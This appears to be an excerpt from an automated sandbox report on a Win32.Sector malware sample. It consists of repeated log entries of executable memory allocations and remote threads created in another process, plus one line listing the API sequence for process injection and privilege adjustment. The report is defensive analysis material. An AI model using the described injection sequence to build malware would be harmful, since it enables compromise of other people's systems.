        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1140000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1150000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: BE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: BF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 560000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 570000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 13F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1400000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: EE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: EF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1110000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1120000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: D00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: D10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 3B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 3C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 930000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 940000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 9F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 780000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 790000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 780000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: AC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: B10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 820000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1550000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 15A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: ED0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: EE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 11D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 11E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: DA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: DB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1250000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1260000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: BC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: BD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1280000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 12D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 900000 protect: page execute and read and writeJump to behavior
        Contains functionality to inject threads in other processes
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_01441EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,1_2_01441EF6
        Creates a thread in another existing process (thread injection)
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: 7B0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: 7C0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: 12B0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: 12C0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: 790000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: 7A0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: A20000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: A30000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: AD0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: AE0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: B90000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe EIP: BA0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 11D0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 11E0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 4E0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 4F0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1040000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1050000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 5D0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 5E0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1350000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1360000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 7C0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 7D0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: A40000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: A50000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 600000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 610000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 190000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1A0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 5A0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 5B0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: E00000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: E10000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 790000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 7A0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 820000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 830000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: F40000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: F50000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: F00000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: F50000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: A40000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: A50000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 7A0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 7B0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1140000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1150000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: BE0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: BF0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 560000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 570000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 13F0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1400000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: A10000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: A20000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: EE0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: EF0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: F00000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: F10000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1110000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1120000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: D00000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: D10000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 3B0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 3C0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 930000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 940000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: A40000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: A50000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 9F0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: A00000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 780000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 790000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 7B0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 7C0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 780000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 7D0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: AC0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: B10000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 7D0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 820000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1550000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 15A0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: ED0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: EE0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 11D0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 11E0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: DA0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: DB0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1250000Jump to behavior
